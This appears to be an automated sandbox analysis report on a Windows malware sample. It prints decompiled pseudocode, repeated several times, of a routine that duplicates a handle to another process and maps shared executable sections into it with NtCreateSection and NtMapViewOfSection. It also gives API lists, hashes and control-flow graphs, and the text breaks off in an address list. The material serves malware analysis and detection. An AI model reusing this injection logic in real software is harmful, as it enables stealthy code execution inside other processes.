                                                                                                                                    				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
                                                                                                                                    				_t184 = _t202 - 0x60;
                                                                                                                                    				 *_t184 = _t176;
                                                                                                                                    				 *((intOrPtr*)(_t129 + 0x4c))(_t88, _t184);
                                                                                                                                    				_t91 =  *_t184;
                                                                                                                                    				if(_t91 != 0) {
                                                                                                                                    					_t133 = _t202 - 0x30;
                                                                                                                                    					 *_t133 = _t91;
                                                                                                                                    					_t133[1] = _t176;
                                                                                                                                    					_t186 = _t202 - 0x28;
                                                                                                                                    					 *((intOrPtr*)(_t129 + 0x10))(_t186, 0x18);
                                                                                                                                    					 *_t186 = 0x18;
                                                                                                                                    					_push(_t202 - 0x30);
                                                                                                                                    					_push(_t186);
                                                                                                                                    					_push(0x40);
                                                                                                                                    					_push(_t202 - 0x10);
                                                                                                                                    					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
                                                                                                                                    						 *(_t202 - 8) = _t176;
                                                                                                                                    						_t99 = _t202 - 0x50;
                                                                                                                                    						 *(_t99 + 4) = _t176;
                                                                                                                                    						 *_t99 = 0x5000;
                                                                                                                                    						_t187 = _t202 - 0x54;
                                                                                                                                    						if(NtCreateSection(_t187, 6, _t176, _t99, 4, 0x8000000, _t176) == 0) {
                                                                                                                                    							 *_t25 =  *(_t202 - 0x50);
                                                                                                                                    							_t122 = _t202 - 0x44;
                                                                                                                                    							 *_t122 = _t176;
                                                                                                                                    							if(NtMapViewOfSection( *_t187, 0xffffffff, _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                                                    								_t124 = _t202 - 0x3c;
                                                                                                                                    								 *_t124 = _t176;
                                                                                                                                    								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t124, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                                                    									_t201 =  *(_t202 - 0x44);
                                                                                                                                    									 *((intOrPtr*)(_t129 + 0x20))(_t176, _t201, 0x104);
                                                                                                                                    									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                                                                                                    									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t101 = _t202 - 0x50;
                                                                                                                                    						 *(_t101 + 4) = _t176;
                                                                                                                                    						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                                                                                                    						_t188 = _t202 - 0x58;
                                                                                                                                    						if(NtCreateSection(_t188, 0xe, _t176, _t101, 0x40, 0x8000000, _t176) == 0) {
                                                                                                                                    							while( *(_t202 - 8) != 0) {
                                                                                                                                    								 *_t46 =  *(_t202 - 0x50);
                                                                                                                                    								_t103 = _t202 - 0x48;
                                                                                                                                    								 *_t103 = _t176;
                                                                                                                                    								if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                                                                    									_t105 = _t202 - 0x40;
                                                                                                                                    									 *_t105 = _t176;
                                                                                                                                    									_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 0x20);
                                                                                                                                    									if(_t224 == 0) {
                                                                                                                                    										L21();
                                                                                                                                    										if(_t224 != 0 || _t224 == 0) {
                                                                                                                                    											L25:
                                                                                                                                    											asm("lodsb");
                                                                                                                                    											goto L43;
                                                                                                                                    											asm("loop 0xffffffc7");
                                                                                                                                    											switch(0x4017c8) {
                                                                                                                                    											}
                                                                                                                                    										} else {
                                                                                                                                    											if(_t224 < 0) {
                                                                                                                                    												continue;
                                                                                                                                    											} else {
                                                                                                                                    												asm("cmpsd");
                                                                                                                                    												_t205 = _t205 - 1;
                                                                                                                                    												goto L25;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								goto L63;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L63:
                                                                                                                                    				_t93 = L00401271(0x15a2, _t129, _t176, _t228);
                                                                                                                                    				return _t93;
                                                                                                                                    			}

























                                                                                                                                    0x00401581
                                                                                                                                    0x00401581
                                                                                                                                    0x0040158b
                                                                                                                                    0x00401593
                                                                                                                                    0x0040159d
                                                                                                                                    0x004015a2
                                                                                                                                    0x004015a5
                                                                                                                                    0x004015a7
                                                                                                                                    0x004015b0
                                                                                                                                    0x004015b2
                                                                                                                                    0x004015b2
                                                                                                                                    0x004015b5
                                                                                                                                    0x004015b5
                                                                                                                                    0x004015ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004018dd
                                                                                                                                    0x004018dd
                                                                                                                                    0x004015c0
                                                                                                                                    0x004015c3
                                                                                                                                    0x004015c6
                                                                                                                                    0x004015ca
                                                                                                                                    0x004015cd
                                                                                                                                    0x004015d1
                                                                                                                                    0x004015d7
                                                                                                                                    0x004015da
                                                                                                                                    0x004015dc
                                                                                                                                    0x004015df
                                                                                                                                    0x004015e5
                                                                                                                                    0x004015e8
                                                                                                                                    0x004015f6
                                                                                                                                    0x004015f7
                                                                                                                                    0x004015f8
                                                                                                                                    0x004015fa
                                                                                                                                    0x00401600
                                                                                                                                    0x00401623
                                                                                                                                    0x00401626
                                                                                                                                    0x00401629
                                                                                                                                    0x0040162c
                                                                                                                                    0x00401632
                                                                                                                                    0x00401647
                                                                                                                                    0x0040164c
                                                                                                                                    0x0040164f
                                                                                                                                    0x00401652
                                                                                                                                    0x0040166a
                                                                                                                                    0x0040166c
                                                                                                                                    0x0040166f
                                                                                                                                    0x00401688
                                                                                                                                    0x0040168a
                                                                                                                                    0x00401694
                                                                                                                                    0x0040169a
                                                                                                                                    0x004016a0
                                                                                                                                    0x004016a0
                                                                                                                                    0x00401688
                                                                                                                                    0x0040166a
                                                                                                                                    0x004016a3
                                                                                                                                    0x004016af
                                                                                                                                    0x004016b2
                                                                                                                                    0x004016b4
                                                                                                                                    0x004016c9
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016dc
                                                                                                                                    0x004016df
                                                                                                                                    0x004016e2
                                                                                                                                    0x004016fa
                                                                                                                                    0x00401700
                                                                                                                                    0x00401703
                                                                                                                                    0x0040171a
                                                                                                                                    0x0040171c
                                                                                                                                    0x00401722
                                                                                                                                    0x00401727
                                                                                                                                    0x0040172f
                                                                                                                                    0x004017a4
                                                                                                                                    0x004017a5
                                                                                                                                    0x004017b1
                                                                                                                                    0x004017c0
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172b
                                                                                                                                    0x0040172b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172d
                                                                                                                                    0x0040172d
                                                                                                                                    0x0040172e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172e
                                                                                                                                    0x0040172b
                                                                                                                                    0x00401727
                                                                                                                                    0x0040171c
                                                                                                                                    0x00000000
                                                                                                                                    0x004016fa
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016c9
                                                                                                                                    0x00401600
                                                                                                                                    0x004018d6
                                                                                                                                    0x00401909
                                                                                                                                    0x00401912

                                                                                                                                    APIs
                                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401615
                                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401642
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401665
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401683
                                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C4
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F5
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401717
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1546783058-0
                                                                                                                                    • Opcode ID: 2724959ca90097593f2bae81e778bd46c3888eae9eec304cee1990dc311dfe77
                                                                                                                                    • Instruction ID: 261b6cc0bc968e0ced8050ca7f20839481a744be2ea717bb7b43cd06ccdbd1b7
                                                                                                                                    • Opcode Fuzzy Hash: 2724959ca90097593f2bae81e778bd46c3888eae9eec304cee1990dc311dfe77
                                                                                                                                    • Instruction Fuzzy Hash: 7B510B71900209BFEB209F91CC49FAF7BB8FF85B10F104169F911BA2E5E6759941CB24
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 82 401577-4015b0 call 401271 89 4015b2 82->89 90 4015b5-4015ba 82->90 89->90 92 4015c0-4015d1 90->92 93 4018d8-4018e0 90->93 96 4018d6 92->96 97 4015d7-401600 92->97 93->90 98 4018e5-401912 call 401271 93->98 96->98 97->96 106 401606-40161d NtDuplicateObject 97->106 106->96 108 401623-401647 NtCreateSection 106->108 110 4016a3-4016c9 NtCreateSection 108->110 111 401649-40166a NtMapViewOfSection 108->111 110->96 114 4016cf-4016d3 110->114 111->110 113 40166c-401688 NtMapViewOfSection 111->113 113->110 116 40168a-4016a0 113->116 114->96 115 4016d9-4016fa NtMapViewOfSection 114->115 115->96 117 401700-40171c NtMapViewOfSection 115->117 116->110 117->96 118 401722 117->118 118->96 120 401722 call 401727 118->120 120->96
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E00401577(signed int __eax, void* __ebx, void* __edx, void* __edi, void* __fp0) {
                                                                                                                                    				intOrPtr _t90;
                                                                                                                                    				long _t93;
                                                                                                                                    				void* _t95;
                                                                                                                                    				struct _GUID _t101;
                                                                                                                                    				struct _GUID _t103;
                                                                                                                                    				PVOID* _t105;
                                                                                                                                    				PVOID* _t107;
                                                                                                                                    				PVOID* _t124;
                                                                                                                                    				PVOID* _t126;
                                                                                                                                    				intOrPtr _t131;
                                                                                                                                    				long* _t135;
                                                                                                                                    				long _t178;
                                                                                                                                    				long* _t186;
                                                                                                                                    				intOrPtr* _t188;
                                                                                                                                    				HANDLE* _t189;
                                                                                                                                    				HANDLE* _t190;
                                                                                                                                    				void* _t203;
                                                                                                                                    				void* _t204;
                                                                                                                                    				void* _t206;
                                                                                                                                    				void* _t207;
                                                                                                                                    				signed int _t212;
                                                                                                                                    				long _t226;
                                                                                                                                    				void* _t231;
                                                                                                                                    
                                                                                                                                    				_t231 = __fp0;
                                                                                                                                    				_t212 = __eax ^ 0x15a2b8d3;
                                                                                                                                    				_push(0x36c);
                                                                                                                                    				_t207 = _t206 + 4;
                                                                                                                                    				L00401271(0x15a2, __ebx, __edi, _t212);
                                                                                                                                    				_t131 =  *((intOrPtr*)(_t204 + 8));
                                                                                                                                    				_t178 = 0;
                                                                                                                                    				 *((intOrPtr*)(_t204 - 0x34)) = 0;
                                                                                                                                    				if(gs != 0) {
                                                                                                                                    					 *((intOrPtr*)(_t204 - 0x34)) =  *((intOrPtr*)(_t204 - 0x34)) + 1;
                                                                                                                                    				}
                                                                                                                                    				while(1) {
                                                                                                                                    					_t90 =  *((intOrPtr*)(_t131 + 0x48))();
                                                                                                                                    					if(_t90 != 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
                                                                                                                                    				}
                                                                                                                                    				 *((intOrPtr*)(_t204 - 0x5c)) = _t90;
                                                                                                                                    				_t186 = _t204 - 0x60;
                                                                                                                                    				 *_t186 = _t178;
                                                                                                                                    				 *((intOrPtr*)(_t131 + 0x4c))(_t90, _t186);
                                                                                                                                    				_t93 =  *_t186;
                                                                                                                                    				if(_t93 != 0) {
                                                                                                                                    					_t135 = _t204 - 0x30;
                                                                                                                                    					 *_t135 = _t93;
                                                                                                                                    					_t135[1] = _t178;
                                                                                                                                    					_t188 = _t204 - 0x28;
                                                                                                                                    					 *((intOrPtr*)(_t131 + 0x10))(_t188, 0x18);
                                                                                                                                    					 *_t188 = 0x18;
                                                                                                                                    					_push(_t204 - 0x30);
                                                                                                                                    					_push(_t188);
                                                                                                                                    					_push(0x40);
                                                                                                                                    					_push(_t204 - 0x10);
                                                                                                                                    					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t204 - 0x10), 0xffffffff, 0xffffffff, _t204 - 0xc, _t178, _t178, 2) == 0) {
                                                                                                                                    						 *(_t204 - 8) = _t178;
                                                                                                                                    						_t101 = _t204 - 0x50;
                                                                                                                                    						 *(_t101 + 4) = _t178;
                                                                                                                                    						 *_t101 = 0x5000;
                                                                                                                                    						_t189 = _t204 - 0x54;
                                                                                                                                    						if(NtCreateSection(_t189, 6, _t178, _t101, 4, 0x8000000, _t178) == 0) {
                                                                                                                                    							 *_t25 =  *(_t204 - 0x50);
                                                                                                                                    							_t124 = _t204 - 0x44;
                                                                                                                                    							 *_t124 = _t178;
                                                                                                                                    							if(NtMapViewOfSection( *_t189, 0xffffffff, _t124, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 4) == 0) {
                                                                                                                                    								_t126 = _t204 - 0x3c;
                                                                                                                                    								 *_t126 = _t178;
                                                                                                                                    								if(NtMapViewOfSection( *_t189,  *(_t204 - 0xc), _t126, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 4) == 0) {
                                                                                                                                    									_t203 =  *(_t204 - 0x44);
                                                                                                                                    									 *((intOrPtr*)(_t131 + 0x20))(_t178, _t203, 0x104);
                                                                                                                                    									 *((intOrPtr*)(_t203 + 0x208)) =  *((intOrPtr*)(_t204 + 0x14));
                                                                                                                                    									 *(_t204 - 8) =  *(_t204 - 8) + 1;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t103 = _t204 - 0x50;
                                                                                                                                    						 *(_t103 + 4) = _t178;
                                                                                                                                    						 *_t103 =  *((intOrPtr*)(_t204 + 0x10)) + 0x10000;
                                                                                                                                    						_t190 = _t204 - 0x58;
                                                                                                                                    						if(NtCreateSection(_t190, 0xe, _t178, _t103, 0x40, 0x8000000, _t178) == 0) {
                                                                                                                                    							while( *(_t204 - 8) != 0) {
                                                                                                                                    								 *_t46 =  *(_t204 - 0x50);
                                                                                                                                    								_t105 = _t204 - 0x48;
                                                                                                                                    								 *_t105 = _t178;
                                                                                                                                    								if(NtMapViewOfSection( *_t190, 0xffffffff, _t105, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 4) == 0) {
                                                                                                                                    									_t107 = _t204 - 0x40;
                                                                                                                                    									 *_t107 = _t178;
                                                                                                                                    									_t226 = NtMapViewOfSection( *_t190,  *(_t204 - 0xc), _t107, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 0x20);
                                                                                                                                    									if(_t226 == 0) {
                                                                                                                                    										L20();
                                                                                                                                    										if(_t226 != 0 || _t226 == 0) {
                                                                                                                                    											L24:
                                                                                                                                    											asm("lodsb");
                                                                                                                                    											goto L42;
                                                                                                                                    											asm("loop 0xffffffc7");
                                                                                                                                    											switch(0x4017c8) {
                                                                                                                                    											}
                                                                                                                                    										} else {
                                                                                                                                    											if(_t226 < 0) {
                                                                                                                                    												continue;
                                                                                                                                    											} else {
                                                                                                                                    												asm("cmpsd");
                                                                                                                                    												_t207 = _t207 - 1;
                                                                                                                                    												goto L24;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								goto L62;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L62:
                                                                                                                                    				_t95 = L00401271(0x15a2, _t131, _t178, _t230);
                                                                                                                                    				return _t95;
                                                                                                                                    			}


























                                                                                                                                    0x00401577
                                                                                                                                    0x00401577
                                                                                                                                    0x0040158b
                                                                                                                                    0x00401593
                                                                                                                                    0x0040159d
                                                                                                                                    0x004015a2
                                                                                                                                    0x004015a5
                                                                                                                                    0x004015a7
                                                                                                                                    0x004015b0
                                                                                                                                    0x004015b2
                                                                                                                                    0x004015b2
                                                                                                                                    0x004015b5
                                                                                                                                    0x004015b5
                                                                                                                                    0x004015ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004018dd
                                                                                                                                    0x004018dd
                                                                                                                                    0x004015c0
                                                                                                                                    0x004015c3
                                                                                                                                    0x004015c6
                                                                                                                                    0x004015ca
                                                                                                                                    0x004015cd
                                                                                                                                    0x004015d1
                                                                                                                                    0x004015d7
                                                                                                                                    0x004015da
                                                                                                                                    0x004015dc
                                                                                                                                    0x004015df
                                                                                                                                    0x004015e5
                                                                                                                                    0x004015e8
                                                                                                                                    0x004015f6
                                                                                                                                    0x004015f7
                                                                                                                                    0x004015f8
                                                                                                                                    0x004015fa
                                                                                                                                    0x00401600
                                                                                                                                    0x00401623
                                                                                                                                    0x00401626
                                                                                                                                    0x00401629
                                                                                                                                    0x0040162c
                                                                                                                                    0x00401632
                                                                                                                                    0x00401647
                                                                                                                                    0x0040164c
                                                                                                                                    0x0040164f
                                                                                                                                    0x00401652
                                                                                                                                    0x0040166a
                                                                                                                                    0x0040166c
                                                                                                                                    0x0040166f
                                                                                                                                    0x00401688
                                                                                                                                    0x0040168a
                                                                                                                                    0x00401694
                                                                                                                                    0x0040169a
                                                                                                                                    0x004016a0
                                                                                                                                    0x004016a0
                                                                                                                                    0x00401688
                                                                                                                                    0x0040166a
                                                                                                                                    0x004016a3
                                                                                                                                    0x004016af
                                                                                                                                    0x004016b2
                                                                                                                                    0x004016b4
                                                                                                                                    0x004016c9
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016dc
                                                                                                                                    0x004016df
                                                                                                                                    0x004016e2
                                                                                                                                    0x004016fa
                                                                                                                                    0x00401700
                                                                                                                                    0x00401703
                                                                                                                                    0x0040171a
                                                                                                                                    0x0040171c
                                                                                                                                    0x00401722
                                                                                                                                    0x00401727
                                                                                                                                    0x0040172f
                                                                                                                                    0x004017a4
                                                                                                                                    0x004017a5
                                                                                                                                    0x004017b1
                                                                                                                                    0x004017c0
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172b
                                                                                                                                    0x0040172b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172d
                                                                                                                                    0x0040172d
                                                                                                                                    0x0040172e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172e
                                                                                                                                    0x0040172b
                                                                                                                                    0x00401727
                                                                                                                                    0x0040171c
                                                                                                                                    0x00000000
                                                                                                                                    0x004016fa
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016c9
                                                                                                                                    0x00401600
                                                                                                                                    0x004018d6
                                                                                                                                    0x00401909
                                                                                                                                    0x00401912

                                                                                                                                    APIs
                                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401615
                                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401642
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401665
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401683
                                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C4
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F5
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401717
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1546783058-0
                                                                                                                                    • Opcode ID: d62221e2a9e443d9bc5816716b28d20c51c631a2778ae685e110c82c7b342627
                                                                                                                                    • Instruction ID: b0faeeba7e18bafba690b3cb0d97e2e89bbfd40d66e78b2ea794a9924a670d05
                                                                                                                                    • Opcode Fuzzy Hash: d62221e2a9e443d9bc5816716b28d20c51c631a2778ae685e110c82c7b342627
                                                                                                                                    • Instruction Fuzzy Hash: 08511B71900209BFEB209F91CC48FAF7BB8FF85B10F104159F911BA2A5E6759941CB24
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 121 401587-4015b0 call 401271 125 4015b2 121->125 126 4015b5-4015ba 121->126 125->126 128 4015c0-4015d1 126->128 129 4018d8-4018e0 126->129 132 4018d6 128->132 133 4015d7-401600 128->133 129->126 134 4018e5-401912 call 401271 129->134 132->134 133->132 142 401606-40161d NtDuplicateObject 133->142 142->132 144 401623-401647 NtCreateSection 142->144 146 4016a3-4016c9 NtCreateSection 144->146 147 401649-40166a NtMapViewOfSection 144->147 146->132 150 4016cf-4016d3 146->150 147->146 149 40166c-401688 NtMapViewOfSection 147->149 149->146 152 40168a-4016a0 149->152 150->132 151 4016d9-4016fa NtMapViewOfSection 150->151 151->132 153 401700-40171c NtMapViewOfSection 151->153 152->146 153->132 154 401722 153->154 154->132 156 401722 call 401727 154->156 156->132
                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E00401587(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __fp0) {
                                                                                                                                    				void* _t87;
                                                                                                                                    				intOrPtr _t90;
                                                                                                                                    				long _t93;
                                                                                                                                    				void* _t95;
                                                                                                                                    				struct _GUID _t101;
                                                                                                                                    				struct _GUID _t103;
                                                                                                                                    				PVOID* _t105;
                                                                                                                                    				PVOID* _t107;
                                                                                                                                    				PVOID* _t124;
                                                                                                                                    				PVOID* _t126;
                                                                                                                                    				intOrPtr _t131;
                                                                                                                                    				long* _t136;
                                                                                                                                    				long _t179;
                                                                                                                                    				long* _t187;
                                                                                                                                    				intOrPtr* _t189;
                                                                                                                                    				HANDLE* _t190;
                                                                                                                                    				HANDLE* _t191;
                                                                                                                                    				void* _t204;
                                                                                                                                    				void* _t205;
                                                                                                                                    				void* _t207;
                                                                                                                                    				void* _t208;
                                                                                                                                    				intOrPtr _t213;
                                                                                                                                    				long _t227;
                                                                                                                                    				void* _t232;
                                                                                                                                    
                                                                                                                                    				_t232 = __fp0;
                                                                                                                                    				asm("out 0xdc, al");
                                                                                                                                    				_t1 = _t205 + 0x68;
                                                                                                                                    				 *_t1 =  *((intOrPtr*)(_t205 + 0x68)) + __ecx;
                                                                                                                                    				_t213 =  *_t1;
                                                                                                                                    				_push(0x36c);
                                                                                                                                    				_t208 = _t207 + 4;
                                                                                                                                    				L00401271(_t87, __ebx, __edi, _t213);
                                                                                                                                    				_t131 =  *((intOrPtr*)(_t205 + 8));
                                                                                                                                    				_t179 = 0;
                                                                                                                                    				 *((intOrPtr*)(_t205 - 0x34)) = 0;
                                                                                                                                    				if(gs != 0) {
                                                                                                                                    					 *((intOrPtr*)(_t205 - 0x34)) =  *((intOrPtr*)(_t205 - 0x34)) + 1;
                                                                                                                                    				}
                                                                                                                                    				while(1) {
                                                                                                                                    					_t90 =  *((intOrPtr*)(_t131 + 0x48))();
                                                                                                                                    					if(_t90 != 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
                                                                                                                                    				}
                                                                                                                                    				 *((intOrPtr*)(_t205 - 0x5c)) = _t90;
                                                                                                                                    				_t187 = _t205 - 0x60;
                                                                                                                                    				 *_t187 = _t179;
                                                                                                                                    				 *((intOrPtr*)(_t131 + 0x4c))(_t90, _t187);
                                                                                                                                    				_t93 =  *_t187;
                                                                                                                                    				if(_t93 != 0) {
                                                                                                                                    					_t136 = _t205 - 0x30;
                                                                                                                                    					 *_t136 = _t93;
                                                                                                                                    					_t136[1] = _t179;
                                                                                                                                    					_t189 = _t205 - 0x28;
                                                                                                                                    					 *((intOrPtr*)(_t131 + 0x10))(_t189, 0x18);
                                                                                                                                    					 *_t189 = 0x18;
                                                                                                                                    					_push(_t205 - 0x30);
                                                                                                                                    					_push(_t189);
                                                                                                                                    					_push(0x40);
                                                                                                                                    					_push(_t205 - 0x10);
                                                                                                                                    					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t205 - 0x10), 0xffffffff, 0xffffffff, _t205 - 0xc, _t179, _t179, 2) == 0) {
                                                                                                                                    						 *(_t205 - 8) = _t179;
                                                                                                                                    						_t101 = _t205 - 0x50;
                                                                                                                                    						 *(_t101 + 4) = _t179;
                                                                                                                                    						 *_t101 = 0x5000;
                                                                                                                                    						_t190 = _t205 - 0x54;
                                                                                                                                    						if(NtCreateSection(_t190, 6, _t179, _t101, 4, 0x8000000, _t179) == 0) {
                                                                                                                                    							 *_t27 =  *(_t205 - 0x50);
                                                                                                                                    							_t124 = _t205 - 0x44;
                                                                                                                                    							 *_t124 = _t179;
                                                                                                                                    							if(NtMapViewOfSection( *_t190, 0xffffffff, _t124, _t179, _t179, _t179, _t205 - 0x38, 1, _t179, 4) == 0) {
                                                                                                                                    								_t126 = _t205 - 0x3c;
                                                                                                                                    								 *_t126 = _t179;
                                                                                                                                    								if(NtMapViewOfSection( *_t190,  *(_t205 - 0xc), _t126, _t179, _t179, _t179, _t205 - 0x38, 1, _t179, 4) == 0) {
                                                                                                                                    									_t204 =  *(_t205 - 0x44);
                                                                                                                                    									 *((intOrPtr*)(_t131 + 0x20))(_t179, _t204, 0x104);
                                                                                                                                    									 *((intOrPtr*)(_t204 + 0x208)) =  *((intOrPtr*)(_t205 + 0x14));
                                                                                                                                    									 *(_t205 - 8) =  *(_t205 - 8) + 1;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t103 = _t205 - 0x50;
                                                                                                                                    						 *(_t103 + 4) = _t179;
                                                                                                                                    						 *_t103 =  *((intOrPtr*)(_t205 + 0x10)) + 0x10000;
                                                                                                                                    						_t191 = _t205 - 0x58;
                                                                                                                                    						if(NtCreateSection(_t191, 0xe, _t179, _t103, 0x40, 0x8000000, _t179) == 0) {
                                                                                                                                    							while( *(_t205 - 8) != 0) {
                                                                                                                                    								 *_t48 =  *(_t205 - 0x50);
                                                                                                                                    								_t105 = _t205 - 0x48;
                                                                                                                                    								 *_t105 = _t179;
                                                                                                                                    								if(NtMapViewOfSection( *_t191, 0xffffffff, _t105, _t179, _t179, _t179, _t205 - 0x38, 1, _t179, 4) == 0) {
                                                                                                                                    									_t107 = _t205 - 0x40;
                                                                                                                                    									 *_t107 = _t179;
                                                                                                                                    									_t227 = NtMapViewOfSection( *_t191,  *(_t205 - 0xc), _t107, _t179, _t179, _t179, _t205 - 0x38, 1, _t179, 0x20);
                                                                                                                                    									if(_t227 == 0) {
                                                                                                                                    										L17();
                                                                                                                                    										if(_t227 != 0 || _t227 == 0) {
                                                                                                                                    											L21:
                                                                                                                                    											asm("lodsb");
                                                                                                                                    											goto L39;
                                                                                                                                    											asm("loop 0xffffffc7");
                                                                                                                                    											switch(0x4017c8) {
                                                                                                                                    											}
                                                                                                                                    										} else {
                                                                                                                                    											if(_t227 < 0) {
                                                                                                                                    												continue;
                                                                                                                                    											} else {
                                                                                                                                    												asm("cmpsd");
                                                                                                                                    												_t208 = _t208 - 1;
                                                                                                                                    												goto L21;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								goto L59;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L59:
                                                                                                                                    				_t95 = L00401271(0x15a2, _t131, _t179, _t231);
                                                                                                                                    				return _t95;
                                                                                                                                    			}



























                                                                                                                                    0x00401587
                                                                                                                                    0x00401587
                                                                                                                                    0x00401589
                                                                                                                                    0x00401589
                                                                                                                                    0x00401589
                                                                                                                                    0x0040158b
                                                                                                                                    0x00401593
                                                                                                                                    0x0040159d
                                                                                                                                    0x004015a2
                                                                                                                                    0x004015a5
                                                                                                                                    0x004015a7
                                                                                                                                    0x004015b0
                                                                                                                                    0x004015b2
                                                                                                                                    0x004015b2
                                                                                                                                    0x004015b5
                                                                                                                                    0x004015b5
                                                                                                                                    0x004015ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004018dd
                                                                                                                                    0x004018dd
                                                                                                                                    0x004015c0
                                                                                                                                    0x004015c3
                                                                                                                                    0x004015c6
                                                                                                                                    0x004015ca
